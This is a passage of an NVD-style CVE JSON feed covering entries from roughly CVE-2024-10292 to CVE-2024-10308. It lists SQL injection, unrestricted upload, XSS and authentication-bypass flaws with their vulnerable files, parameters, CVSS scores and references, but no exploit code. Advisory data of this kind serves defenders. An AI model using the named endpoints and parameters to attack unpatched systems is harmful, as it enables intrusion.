] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ZZCMS 2023 and classified as critical. This issue affects some unknown processing of the file 3/Ebak5.1/upload/ChangeTable.php. The manipulation of the argument savefilename leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zzcms:zzcms:2023:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T16:15Z", "lastModifiedDate" : "2024-10-30T13:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10293", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/LvZCh/zzcms2023/issues/6", "name" : "https://github.com/LvZCh/zzcms2023/issues/6", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281562", "name" : "VDB-281562 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281562", "name" : "VDB-281562 | ZZCMS functions.php Ebak_SetGotoPak unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.427146", "name" : "Submit #427146 | zzcms 2023 The file contains", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ZZCMS 2023. It has been classified as critical. Affected is the function Ebak_SetGotoPak of the file 3/Ebbak5.1/upload/class/functions.php. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zzcms:zzcms:2023:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T16:15Z", "lastModifiedDate" : "2024-10-30T13:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10294", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/includes/ce21-functions.php?rev=3097700#L340", "name" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/includes/ce21-functions.php?rev=3097700#L340", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The CE21 Suite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ce21_single_sign_on_save_api_settings' function in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to change plugin settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ce21:ce21_suite:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.2.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-09T03:15Z", "lastModifiedDate" : "2025-01-29T18:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10295", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-10295", "name" : "https://access.redhat.com/security/cve/CVE-2024-10295", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2321258", "name" : "RHBZ#2321258", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in Gateway. Sending a non-base64 'basic' auth with special characters can cause APICast to incorrectly authenticate a request. A malformed basic authentication header containing special characters bypasses authentication and allows unauthorized access to the backend. This issue can occur due to a failure in the base64 decoding process, which causes APICast to skip the rest of the authentication checks and proceed with routing the request upstream." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:3scale_api_management:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-24T18:15Z", "lastModifiedDate" : "2025-06-18T18:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10296", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.281563", "name" : "VDB-281563 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281563", "name" : "VDB-281563 | PHPGurukul Medical Card Generation System Report of Medical Card Page card-bwdates-reports-details.php sql injection", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427400", "name" : "Submit #427400 | PHPGurukul Medical Card Generation System V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Medical Card Generation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/card-bwdates-reports-details.php of the component Report of Medical Card Page. The manipulation of the argument fromdate/todate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T17:15Z", "lastModifiedDate" : "2025-07-16T17:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10297", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281564", "name" : "VDB-281564 | PHPGurukul Medical Card Generation System Managecard Edit Image Page changeimage.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281564", "name" : "VDB-281564 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Medical Card Generation System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/changeimage.php of the component Managecard Edit Image Page. The manipulation of the argument editid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:anujk305:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T18:15Z", "lastModifiedDate" : "2025-05-06T17:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10298", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.281565", "name" : "VDB-281565 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281565", "name" : "VDB-281565 | PHPGurukul Medical Card Generation System Managecard Edit Card Detail Page edit-card-detail.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427403", "name" : "Submit #427403 | PHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in PHPGurukul Medical Card Generation System 1.0. This affects an unknown part of the file /admin/edit-card-detail.php of the component Managecard Edit Card Detail Page. The manipulation of the argument editid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T19:15Z", "lastModifiedDate" : "2024-10-25T18:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10299", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.281566", "name" : "VDB-281566 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281566", "name" : "VDB-281566 | PHPGurukul Medical Card Generation System Managecard View Detail Page view-card-detail.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in PHPGurukul Medical Card Generation System 1.0. This vulnerability affects unknown code of the file /admin/view-card-detail.php of the component Managecard View Detail Page. The manipulation of the argument viewid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T19:15Z", "lastModifiedDate" : "2024-10-25T18:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1030", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252303", "name" : "https://vuldb.com/?ctiid.252303", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252303", "name" : "https://vuldb.com/?id.252303", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252303", "name" : "https://vuldb.com/?ctiid.252303", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252303", "name" : "https://vuldb.com/?id.252303", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cogites:ereserv:7.7.58:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T10:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10300", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281567", "name" : "VDB-281567 | PHPGurukul Medical Card Generation System View Enquiry Page view-enquiry.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281567", "name" : "VDB-281567 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427404", "name" : "Submit #427404 | PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in PHPGurukul Medical Card Generation System 1.0. This issue affects some unknown processing of the file /admin/view-enquiry.php of the component View Enquiry Page. The manipulation of the argument viewid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T20:15Z", "lastModifiedDate" : "2024-10-25T18:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10301", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281568", "name" : "VDB-281568 | PHPGurukul Medical Card Generation System Search search-medicalcard.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281568", "name" : "VDB-281568 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427405", "name" : "Submit #427405 | PHPGurukul Medical Card Generation System - searchdata Parameter V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in PHPGurukul Medical Card Generation System 1.0. Affected is an unknown function of the file /admin/search-medicalcard.php of the component Search. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:medical_card_generation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T20:15Z", "lastModifiedDate" : "2024-10-25T18:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10305", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10306", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHBA-2025:2973", "name" : "RHBA-2025:2973", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHBA-2025:5309", "name" : "RHBA-2025:5309", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:9434", "name" : "RHSA-2025:9434", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:9466", "name" : "RHSA-2025:9466", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:9997", "name" : "RHSA-2025:9997", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-10306", "name" : "https://access.redhat.com/security/cve/CVE-2024-10306", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2321302", "name" : "RHBZ#2321302", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in mod_proxy_cluster. The issue is that the directive should be replaced by the directive as the former does not restrict IP/host access as `Require ip IP_ADDRESS` would suggest. This means that anyone with access to the host might send MCMP requests that may result in adding/removing/updating nodes for the balancing. However, this host should not be accessible to the public network as it does not serve the general traffic." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-04-23T10:15Z", "lastModifiedDate" : "2025-07-01T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10307", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-770" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/500497", "name" : "GitLab Issue #500497", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://hackerone.com/reports/2775113", "name" : "HackerOne Bug Bounty Report #2775113", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab EE/CE affecting all versions from 12.10 before 17.8.6, 17.9 before 17.9.3, and 17.10 before 17.10.1. A maliciously crafted file can cause uncontrolled CPU consumption when viewing the associated merge request." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.9.0", "versionEndExcluding" : "17.9.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.10.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "17.9.0", "versionEndExcluding" : "17.9.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.10.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "12.10.0", "versionEndExcluding" : "17.8.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "12.10.0", "versionEndExcluding" : "17.8.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2025-03-28T10:15Z", "lastModifiedDate" : "2025-08-13T01:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10308", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3193980/jeg-elementor-kit", "name" : "https://plugins.trac.wordpress.org/changeset/3193980/jeg-elementor-kit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.10", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-26T11:15Z", "lastModifiedDate" : "2025-01-09T20:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { 